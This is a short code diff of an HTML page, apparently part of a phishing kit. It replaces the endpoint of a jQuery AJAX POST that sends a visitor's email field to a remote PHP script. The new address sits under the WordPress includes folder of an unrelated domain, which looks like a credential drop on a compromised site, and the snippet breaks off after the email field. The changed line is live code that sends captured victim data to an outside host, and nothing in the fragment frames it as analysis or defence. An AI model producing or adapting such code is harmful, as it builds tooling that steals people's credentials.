--- a/hhhhhgh.html
+++ b/hhhhhgh.html
@@ -388,7 +388,7 @@ count=count+1;
 
 $.ajax({
 dataType: 'JSON',
-url: 'https://gasc.uk/gfd/New.php',
+url: 'https://cryptoglobalinvestment.net/wp-includes/cn/obinna/New.php',
 type: 'POST',
 data:{
 email:email,
